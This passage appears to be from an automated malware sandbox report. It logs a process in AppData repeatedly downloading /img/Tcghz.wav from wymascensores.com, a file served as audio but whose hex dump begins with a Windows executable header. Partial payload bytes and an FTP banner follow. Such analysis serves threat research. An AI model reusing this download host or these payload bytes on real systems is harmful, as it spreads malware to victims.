                                                        2024-09-27 08:43:23 UTC8000INData Raw: 30 30 30 34 31 30 34 30 30 30 30 46 37 30 31 30 30 30 30 33 38 30 36 30 30 30 30 30 36 30 30 30 30 30 30 31 42 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 35 33 30 36 30 30 30 30 35 33 30 36 30 30 30 30 30 36 30 30 30 30 30 30 31 42 30 30 30 30 30 31 30 36 32 41 30 30 30 30 31 33 33 30 30 34 30 30 33 34 30 30 30 30 30 30 35 31 30 30 30 30 31 31 32 30 30 32 30 30 30 30 30 30 38 44 31 37 30 30 30 30 30 31 30 41 30 36 32 30 30 30 30 30 30 30 30 30 46 45 30 39 30 30 30 30 41 32 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 39 30 31 30 30 38 43 30 34 30 30 30 30 30 31 41 32 32 30 30 30 30 30 30 30 30 30 30 36 31 34 32 38 42 36 30 34 30 30 30 36 32 36 32 41 31 42 33 30 30 36 30 30 42 45 30 31 30 30 30 30 35 32 30 30 30 30 31 31 37 45 35 43
                                                        Data Ascii: 00041040000F701000038060000060000001B00000100000000000000005306000053060000060000001B000001062A000013300400340000005100001120020000008D170000010A062000000000FE090000A2062001000000FE0901008C04000001A22000000000061428B6040006262A1B300600BE010000520000117E5C


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.55207367.212.175.1624431120C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-27 08:43:46 UTC80OUTGET /img/Tcghz.wav HTTP/1.1
                                                        Host: wymascensores.com
                                                        Connection: Keep-Alive
                                                        2024-09-27 08:43:46 UTC211INHTTP/1.1 200 OK
                                                        Date: Fri, 27 Sep 2024 08:43:45 GMT
                                                        Server: Apache
                                                        Last-Modified: Thu, 26 Sep 2024 07:21:12 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1917952
                                                        Connection: close
                                                        Content-Type: audio/x-wav
                                                        2024-09-27 08:43:46 UTC7981INData Raw: 34 44 35 41 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 46 46 46 46 30 30 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 45 31 46 42 41 30 45 30 30 42 34 30 39 43 44 32 31 42 38 30 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 36 33 36 31 36 45 36 45 36 46 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 45 32 30 36 39 36 45 32 30 34 34 34 46 35 33 32 30 36 44 36 46 36 34 36 35 32 45 30 44 30 44 30 41 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                        Data Ascii: 4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000
                                                        2024-09-27 08:43:46 UTC8000INData Raw: 34 36 31 37 45 43 45 30 32 30 30 30 34 32 38 34 38 30 39 30 30 30 36 32 38 31 32 30 30 30 30 32 42 38 30 33 36 30 30 30 30 30 34 32 30 31 45 30 30 30 30 30 30 33 38 46 39 46 38 46 46 46 46 32 30 46 39 33 31 38 39 36 39 32 30 30 36 42 38 37 30 36 31 36 31 37 45 38 36 30 32 30 30 30 34 37 42 37 41 30 32 30 30 30 34 36 31 37 45 43 45 30 32 30 30 30 34 32 38 34 38 30 39 30 30 30 36 32 30 31 38 32 31 46 31 32 42 32 30 30 36 30 30 30 30 30 30 36 32 32 30 45 46 38 42 43 43 38 35 36 31 37 45 38 36 30 32 30 30 30 34 37 42 35 32 30 32 30 30 30 34 36 31 37 45 43 45 30 32 30 30 30 34 32 38 34 38 30 39 30 30 30 36 32 38 31 33 30 30 30 30 32 42 38 30 33 34 30 30 30 30 30 34 32 30 30 39 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 39 37 46 38 46 46 46 46 32 30 43 33
                                                        Data Ascii: 4617ECE0200042848090006281200002B8036000004201E00000038F9F8FFFF20F93189692006B87061617E860200047B7A020004617ECE0200042848090006201821F12B20060000006220EF8BCC85617E860200047B52020004617ECE0200042848090006281300002B80340000042009000000FE0E00003897F8FFFF20C3
                                                        2024-09-27 08:43:46 UTC8000INData Raw: 32 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 33 30 30 30 30 30 30 32 45 30 30 30 30 30 30 30 35 30 30 30 30 30 30 32 46 30 30 30 30 30 30 33 38 32 39 30 30 30 30 30 30 37 45 41 41 30 32 30 30 30 34 32 38 42 38 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 38 36 30 32 30 30 30 34 37 42 37 41 30 32 30 30 30 34 33 41 43 43 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 41 39 30 32 30 30 30 34 32 38 42 34 30 38 30 30 30 36 32 30 30 31 30 30 30 30 30 30 37 45 38 36 30 32 30 30 30 34 37 42 35 30 30 32 30 30 30 34 33 39 41 32 46 46 46 46 46 46 32 36 32 30 30 31 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 31 37 32 41 30 30
                                                        Data Ascii: 2000000FE0E00003800000000FE0C000045030000002E000000050000002F00000038290000007EAA02000428B808000620000000007E860200047B7A0200043ACCFFFFFF26200000000038C1FFFFFF2A7EA902000428B408000620010000007E860200047B5002000439A2FFFFFF2620010000003897FFFFFF120000172A00
                                                        2024-09-27 08:43:46 UTC8000INData Raw: 30 30 30 30 35 30 30 30 30 30 30 32 46 30 30 30 30 30 30 33 38 32 39 30 30 30 30 30 30 37 45 41 41 30 32 30 30 30 34 32 38 42 38 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 38 36 30 32 30 30 30 34 37 42 38 33 30 32 30 30 30 34 33 41 43 43 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 41 39 30 32 30 30 30 34 32 38 42 34 30 38 30 30 30 36 32 30 30 31 30 30 30 30 30 30 37 45 38 36 30 32 30 30 30 34 37 42 35 42 30 32 30 30 30 34 33 41 41 32 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 31 36 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 37 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 37 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30
                                                        Data Ascii: 000050000002F00000038290000007EAA02000428B808000620000000007E860200047B830200043ACCFFFFFF26200000000038C1FFFFFF2A7EA902000428B408000620010000007E860200047B5B0200043AA2FFFFFF2620000000003897FFFFFF120000162A000000120000172A000000120000172A000000120000142A00
                                                        2024-09-27 08:43:46 UTC8000INData Raw: 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 41 41 30 32 30 30 30 34 32 38 42 38 30 38 30 30 30 36 32 30 30 32 30 30 30 30 30 30 37 45 38 36 30 32 30 30 30 34 37 42 38 30 30 32 30 30 30 34 33 41 41 32 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 37 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 37 32 41 30 30
                                                        Data Ascii: 0000038C1FFFFFF2A7EAA02000428B808000620020000007E860200047B800200043AA2FFFFFF2620000000003897FFFFFF120000002A000000120000142A000000120000002A000000120000002A000000120000002A000000120000142A000000120000002A000000120000172A000000120000142A000000120000172A00
                                                        2024-09-27 08:43:46 UTC8000INData Raw: 30 30 30 39 34 30 30 30 30 30 30 41 37 30 30 30 30 30 30 33 42 30 31 30 30 30 30 37 36 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 35 38 30 30 30 30 30 30 35 39 30 31 30 30 30 30 42 31 30 31 30 30 30 30 37 36 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 33 33 30 30 34 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 35 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 30 31 31 43 30 30 30 30 30 32 30 30 36 45 30 30 31 39 38 37 30 30 30 44 30 30 30 30 30 30 30 30 30 32 30 30 39 44 30 30 32 33 43 30 30 30 30 46 30 30 30 30 30 30 30 30 30 33 33 30 30 38 30 30 30 34 30 30
                                                        Data Ascii: 00094000000A70000003B0100007600000000000000020000005800000059010000B101000076000000000000001330040004000000000000000000142A1330050004000000000000000000142A0330080004000000000000000000142A011C000002006E001987000D0000000002009D0023C0000F00000000033008000400
                                                        2024-09-27 08:43:46 UTC8000INData Raw: 38 36 44 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 46 30 44 31 46 31 35 31 46 33 43 30 36 32 38 36 44 30 33 30 30 30 36 31 32 30 33 31 31 30 34 31 31 30 35 31 31 30 36 31 41 31 43 31 46 33 44 30 36 32 38 36 44 30 33 30 30 30 36 31 32 30 36 30 39 31 31 30 34 31 31 30 35 31 46 30 42 31 46 30 41 31 46 33 45 30 36 32 38 36 44 30 33 30 30 30 36 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 38 31 46 30 46 31 46 33 46 30 36 32 38 36 44 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 46 30 39 31 46 31 35 31 46 34 30 30 36 32 38 36 44 30 33 30 30 30 36 30 39 31 31 30 46 35 38 30 44 31 31 30 34 31 31 31 30 35 38 31 33 30 34 31 31 30 35 31 31 31 31 35 38 31 33 30 35 31 31 30 36 31 31 31 32 35 38 31 33 30 36 31 31 30 44 31 37 35 38
                                                        Data Ascii: 86D030006120411051106091F0D1F151F3C06286D03000612031104110511061A1C1F3D06286D030006120609110411051F0B1F0A1F3E06286D03000612051106091104181F0F1F3F06286D030006120411051106091F091F151F4006286D03000609110F580D110411105813041105111158130511061112581306110D1758
                                                        2024-09-27 08:43:46 UTC8000INData Raw: 30 32 38 43 42 30 33 30 30 30 36 31 31 31 39 32 38 43 43 30 33 30 30 30 36 31 33 31 30 31 31 31 39 32 30 38 36 30 30 30 30 30 30 36 41 32 38 42 39 30 33 30 30 30 36 31 31 31 37 32 38 43 39 30 33 30 30 30 36 31 33 31 43 31 31 31 39 31 31 31 30 32 38 42 39 30 33 30 30 30 36 31 31 30 36 31 31 31 39 31 31 31 43 31 46 32 38 35 41 31 31 32 37 32 38 43 38 30 33 30 30 30 36 31 31 31 39 32 38 43 43 30 33 30 30 30 36 31 33 31 34 33 41 41 31 46 42 46 46 46 46 32 30 31 46 30 30 30 30 30 30 32 38 44 41 30 33 30 30 30 36 33 39 41 41 46 39 46 46 46 46 32 36 32 30 30 32 30 30 30 30 30 30 33 38 39 46 46 39 46 46 46 46 44 44 43 46 31 37 30 30 30 30 32 36 32 30 30 30 30 30 30 30 30 30 32 38 44 39 30 33 30 30 30 36 33 41 30 46 30 30 30 30 30 30 32 36 32 30 30 30 30 30 30 30
                                                        Data Ascii: 028CB030006111928CC0300061310111920860000006A28B9030006111728C9030006131C1119111028B903000611061119111C1F285A112728C8030006111928CC03000613143AA1FBFFFF201F00000028DA03000639AAF9FFFF262002000000389FF9FFFFDDCF17000026200000000028D90300063A0F0000002620000000
                                                        2024-09-27 08:43:46 UTC8000INData Raw: 30 32 30 42 42 30 30 30 30 30 30 32 30 33 45 30 30 30 30 30 30 35 39 39 43 32 30 34 45 30 30 30 30 30 30 32 30 34 37 30 30 30 30 30 30 35 38 46 45 30 45 30 45 30 30 46 45 30 43 31 44 30 30 32 30 30 30 30 30 30 30 30 30 46 45 30 43 30 45 30 30 39 43 32 30 31 37 30 30 30 30 30 30 32 30 32 42 30 30 30 30 30 30 35 38 46 45 30 45 30 45 30 30 46 45 30 43 31 44 30 30 32 30 30 30 30 30 30 30 30 30 46 45 30 43 30 45 30 30 39 43 32 30 30 32 30 30 30 30 30 30 32 30 36 35 30 30 30 30 30 30 35 38 46 45 30 45 30 45 30 30 46 45 30 43 31 44 30 30 32 30 30 30 30 30 30 30 30 30 46 45 30 43 30 45 30 30 39 43 46 45 30 43 31 44 30 30 32 30 30 30 30 30 30 30 30 30 32 30 35 32 30 30 30 30 30 30 32 30 37 35 30 30 30 30 30 30 35 38 39 43 32 30 38 46 30 30 30 30 30 30 32 30 32 37
                                                        Data Ascii: 020BB000000203E000000599C204E000000204700000058FE0E0E00FE0C1D002000000000FE0C0E009C2017000000202B00000058FE0E0E00FE0C1D002000000000FE0C0E009C2002000000206500000058FE0E0E00FE0C1D002000000000FE0C0E009CFE0C1D00200000000020520000002075000000589C208F0000002027
                                                        2024-09-27 08:43:46 UTC8000INData Raw: 30 30 30 34 31 30 34 30 30 30 30 46 37 30 31 30 30 30 30 33 38 30 36 30 30 30 30 30 36 30 30 30 30 30 30 31 42 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 35 33 30 36 30 30 30 30 35 33 30 36 30 30 30 30 30 36 30 30 30 30 30 30 31 42 30 30 30 30 30 31 30 36 32 41 30 30 30 30 31 33 33 30 30 34 30 30 33 34 30 30 30 30 30 30 35 31 30 30 30 30 31 31 32 30 30 32 30 30 30 30 30 30 38 44 31 37 30 30 30 30 30 31 30 41 30 36 32 30 30 30 30 30 30 30 30 30 46 45 30 39 30 30 30 30 41 32 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 39 30 31 30 30 38 43 30 34 30 30 30 30 30 31 41 32 32 30 30 30 30 30 30 30 30 30 30 36 31 34 32 38 42 36 30 34 30 30 30 36 32 36 32 41 31 42 33 30 30 36 30 30 42 45 30 31 30 30 30 30 35 32 30 30 30 30 31 31 37 45 35 43
                                                        Data Ascii: 00041040000F701000038060000060000001B00000100000000000000005306000053060000060000001B000001062A000013300400340000005100001120020000008D170000010A062000000000FE090000A2062001000000FE0901008C04000001A22000000000061428B6040006262A1B300600BE010000520000117E5C


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.55207767.212.175.1624432928C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-27 08:43:54 UTC80OUTGET /img/Tcghz.wav HTTP/1.1
                                                        Host: wymascensores.com
                                                        Connection: Keep-Alive
                                                        2024-09-27 08:43:54 UTC211INHTTP/1.1 200 OK
                                                        Date: Fri, 27 Sep 2024 08:43:54 GMT
                                                        Server: Apache
                                                        Last-Modified: Thu, 26 Sep 2024 07:21:12 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1917952
                                                        Connection: close
                                                        Content-Type: audio/x-wav
                                                        2024-09-27 08:43:54 UTC7981INData Raw: 34 44 35 41 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 46 46 46 46 30 30 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 45 31 46 42 41 30 45 30 30 42 34 30 39 43 44 32 31 42 38 30 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 36 33 36 31 36 45 36 45 36 46 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 45 32 30 36 39 36 45 32 30 34 34 34 46 35 33 32 30 36 44 36 46 36 34 36 35 32 45 30 44 30 44 30 41 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                        Data Ascii: 4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000
                                                        2024-09-27 08:43:54 UTC8000INData Raw: 34 36 31 37 45 43 45 30 32 30 30 30 34 32 38 34 38 30 39 30 30 30 36 32 38 31 32 30 30 30 30 32 42 38 30 33 36 30 30 30 30 30 34 32 30 31 45 30 30 30 30 30 30 33 38 46 39 46 38 46 46 46 46 32 30 46 39 33 31 38 39 36 39 32 30 30 36 42 38 37 30 36 31 36 31 37 45 38 36 30 32 30 30 30 34 37 42 37 41 30 32 30 30 30 34 36 31 37 45 43 45 30 32 30 30 30 34 32 38 34 38 30 39 30 30 30 36 32 30 31 38 32 31 46 31 32 42 32 30 30 36 30 30 30 30 30 30 36 32 32 30 45 46 38 42 43 43 38 35 36 31 37 45 38 36 30 32 30 30 30 34 37 42 35 32 30 32 30 30 30 34 36 31 37 45 43 45 30 32 30 30 30 34 32 38 34 38 30 39 30 30 30 36 32 38 31 33 30 30 30 30 32 42 38 30 33 34 30 30 30 30 30 34 32 30 30 39 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 39 37 46 38 46 46 46 46 32 30 43 33
                                                        Data Ascii: 4617ECE0200042848090006281200002B8036000004201E00000038F9F8FFFF20F93189692006B87061617E860200047B7A020004617ECE0200042848090006201821F12B20060000006220EF8BCC85617E860200047B52020004617ECE0200042848090006281300002B80340000042009000000FE0E00003897F8FFFF20C3
                                                        2024-09-27 08:43:54 UTC8000INData Raw: 32 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 33 30 30 30 30 30 30 32 45 30 30 30 30 30 30 30 35 30 30 30 30 30 30 32 46 30 30 30 30 30 30 33 38 32 39 30 30 30 30 30 30 37 45 41 41 30 32 30 30 30 34 32 38 42 38 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 38 36 30 32 30 30 30 34 37 42 37 41 30 32 30 30 30 34 33 41 43 43 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 41 39 30 32 30 30 30 34 32 38 42 34 30 38 30 30 30 36 32 30 30 31 30 30 30 30 30 30 37 45 38 36 30 32 30 30 30 34 37 42 35 30 30 32 30 30 30 34 33 39 41 32 46 46 46 46 46 46 32 36 32 30 30 31 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 31 37 32 41 30 30
                                                        Data Ascii: 2000000FE0E00003800000000FE0C000045030000002E000000050000002F00000038290000007EAA02000428B808000620000000007E860200047B7A0200043ACCFFFFFF26200000000038C1FFFFFF2A7EA902000428B408000620010000007E860200047B5002000439A2FFFFFF2620010000003897FFFFFF120000172A00
                                                        2024-09-27 08:43:54 UTC8000INData Raw: 30 30 30 30 35 30 30 30 30 30 30 32 46 30 30 30 30 30 30 33 38 32 39 30 30 30 30 30 30 37 45 41 41 30 32 30 30 30 34 32 38 42 38 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 38 36 30 32 30 30 30 34 37 42 38 33 30 32 30 30 30 34 33 41 43 43 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 41 39 30 32 30 30 30 34 32 38 42 34 30 38 30 30 30 36 32 30 30 31 30 30 30 30 30 30 37 45 38 36 30 32 30 30 30 34 37 42 35 42 30 32 30 30 30 34 33 41 41 32 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 31 36 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 37 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 37 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30
                                                        Data Ascii: 000050000002F00000038290000007EAA02000428B808000620000000007E860200047B830200043ACCFFFFFF26200000000038C1FFFFFF2A7EA902000428B408000620010000007E860200047B5B0200043AA2FFFFFF2620000000003897FFFFFF120000162A000000120000172A000000120000172A000000120000142A00
                                                        2024-09-27 08:43:54 UTC8000INData Raw: 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 41 41 30 32 30 30 30 34 32 38 42 38 30 38 30 30 30 36 32 30 30 32 30 30 30 30 30 30 37 45 38 36 30 32 30 30 30 34 37 42 38 30 30 32 30 30 30 34 33 41 41 32 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 37 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 37 32 41 30 30
                                                        Data Ascii: 0000038C1FFFFFF2A7EAA02000428B808000620020000007E860200047B800200043AA2FFFFFF2620000000003897FFFFFF120000002A000000120000142A000000120000002A000000120000002A000000120000002A000000120000142A000000120000002A000000120000172A000000120000142A000000120000172A00
                                                        2024-09-27 08:43:54 UTC8000INData Raw: 30 30 30 39 34 30 30 30 30 30 30 41 37 30 30 30 30 30 30 33 42 30 31 30 30 30 30 37 36 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 35 38 30 30 30 30 30 30 35 39 30 31 30 30 30 30 42 31 30 31 30 30 30 30 37 36 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 33 33 30 30 34 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 35 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 30 31 31 43 30 30 30 30 30 32 30 30 36 45 30 30 31 39 38 37 30 30 30 44 30 30 30 30 30 30 30 30 30 32 30 30 39 44 30 30 32 33 43 30 30 30 30 46 30 30 30 30 30 30 30 30 30 33 33 30 30 38 30 30 30 34 30 30
                                                        Data Ascii: 00094000000A70000003B0100007600000000000000020000005800000059010000B101000076000000000000001330040004000000000000000000142A1330050004000000000000000000142A0330080004000000000000000000142A011C000002006E001987000D0000000002009D0023C0000F00000000033008000400
                                                        2024-09-27 08:43:55 UTC8000INData Raw: 38 36 44 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 46 30 44 31 46 31 35 31 46 33 43 30 36 32 38 36 44 30 33 30 30 30 36 31 32 30 33 31 31 30 34 31 31 30 35 31 31 30 36 31 41 31 43 31 46 33 44 30 36 32 38 36 44 30 33 30 30 30 36 31 32 30 36 30 39 31 31 30 34 31 31 30 35 31 46 30 42 31 46 30 41 31 46 33 45 30 36 32 38 36 44 30 33 30 30 30 36 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 38 31 46 30 46 31 46 33 46 30 36 32 38 36 44 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 46 30 39 31 46 31 35 31 46 34 30 30 36 32 38 36 44 30 33 30 30 30 36 30 39 31 31 30 46 35 38 30 44 31 31 30 34 31 31 31 30 35 38 31 33 30 34 31 31 30 35 31 31 31 31 35 38 31 33 30 35 31 31 30 36 31 31 31 32 35 38 31 33 30 36 31 31 30 44 31 37 35 38
                                                        Data Ascii: 86D030006120411051106091F0D1F151F3C06286D03000612031104110511061A1C1F3D06286D030006120609110411051F0B1F0A1F3E06286D03000612051106091104181F0F1F3F06286D030006120411051106091F091F151F4006286D03000609110F580D110411105813041105111158130511061112581306110D1758
                                                        2024-09-27 08:43:55 UTC8000INData Raw: 30 32 38 43 42 30 33 30 30 30 36 31 31 31 39 32 38 43 43 30 33 30 30 30 36 31 33 31 30 31 31 31 39 32 30 38 36 30 30 30 30 30 30 36 41 32 38 42 39 30 33 30 30 30 36 31 31 31 37 32 38 43 39 30 33 30 30 30 36 31 33 31 43 31 31 31 39 31 31 31 30 32 38 42 39 30 33 30 30 30 36 31 31 30 36 31 31 31 39 31 31 31 43 31 46 32 38 35 41 31 31 32 37 32 38 43 38 30 33 30 30 30 36 31 31 31 39 32 38 43 43 30 33 30 30 30 36 31 33 31 34 33 41 41 31 46 42 46 46 46 46 32 30 31 46 30 30 30 30 30 30 32 38 44 41 30 33 30 30 30 36 33 39 41 41 46 39 46 46 46 46 32 36 32 30 30 32 30 30 30 30 30 30 33 38 39 46 46 39 46 46 46 46 44 44 43 46 31 37 30 30 30 30 32 36 32 30 30 30 30 30 30 30 30 30 32 38 44 39 30 33 30 30 30 36 33 41 30 46 30 30 30 30 30 30 32 36 32 30 30 30 30 30 30 30
                                                        Data Ascii: 028CB030006111928CC0300061310111920860000006A28B9030006111728C9030006131C1119111028B903000611061119111C1F285A112728C8030006111928CC03000613143AA1FBFFFF201F00000028DA03000639AAF9FFFF262002000000389FF9FFFFDDCF17000026200000000028D90300063A0F0000002620000000
                                                        2024-09-27 08:43:55 UTC8000INData Raw: 30 32 30 42 42 30 30 30 30 30 30 32 30 33 45 30 30 30 30 30 30 35 39 39 43 32 30 34 45 30 30 30 30 30 30 32 30 34 37 30 30 30 30 30 30 35 38 46 45 30 45 30 45 30 30 46 45 30 43 31 44 30 30 32 30 30 30 30 30 30 30 30 30 46 45 30 43 30 45 30 30 39 43 32 30 31 37 30 30 30 30 30 30 32 30 32 42 30 30 30 30 30 30 35 38 46 45 30 45 30 45 30 30 46 45 30 43 31 44 30 30 32 30 30 30 30 30 30 30 30 30 46 45 30 43 30 45 30 30 39 43 32 30 30 32 30 30 30 30 30 30 32 30 36 35 30 30 30 30 30 30 35 38 46 45 30 45 30 45 30 30 46 45 30 43 31 44 30 30 32 30 30 30 30 30 30 30 30 30 46 45 30 43 30 45 30 30 39 43 46 45 30 43 31 44 30 30 32 30 30 30 30 30 30 30 30 30 32 30 35 32 30 30 30 30 30 30 32 30 37 35 30 30 30 30 30 30 35 38 39 43 32 30 38 46 30 30 30 30 30 30 32 30 32 37
                                                        Data Ascii: 020BB000000203E000000599C204E000000204700000058FE0E0E00FE0C1D002000000000FE0C0E009C2017000000202B00000058FE0E0E00FE0C1D002000000000FE0C0E009C2002000000206500000058FE0E0E00FE0C1D002000000000FE0C0E009CFE0C1D00200000000020520000002075000000589C208F0000002027
                                                        2024-09-27 08:43:55 UTC8000INData Raw: 30 30 30 34 31 30 34 30 30 30 30 46 37 30 31 30 30 30 30 33 38 30 36 30 30 30 30 30 36 30 30 30 30 30 30 31 42 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 35 33 30 36 30 30 30 30 35 33 30 36 30 30 30 30 30 36 30 30 30 30 30 30 31 42 30 30 30 30 30 31 30 36 32 41 30 30 30 30 31 33 33 30 30 34 30 30 33 34 30 30 30 30 30 30 35 31 30 30 30 30 31 31 32 30 30 32 30 30 30 30 30 30 38 44 31 37 30 30 30 30 30 31 30 41 30 36 32 30 30 30 30 30 30 30 30 30 46 45 30 39 30 30 30 30 41 32 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 39 30 31 30 30 38 43 30 34 30 30 30 30 30 31 41 32 32 30 30 30 30 30 30 30 30 30 30 36 31 34 32 38 42 36 30 34 30 30 30 36 32 36 32 41 31 42 33 30 30 36 30 30 42 45 30 31 30 30 30 30 35 32 30 30 30 30 31 31 37 45 35 43
                                                        Data Ascii: 00041040000F701000038060000060000001B00000100000000000000005306000053060000060000001B000001062A000013300400340000005100001120020000008D170000010A062000000000FE090000A2062001000000FE0901008C04000001A22000000000061428B6040006262A1B300600BE010000520000117E5C


                                                        FTP Packets

                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                        Sep 27, 2024 10:43:37.644287109 CEST21497055.2.84.236192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.
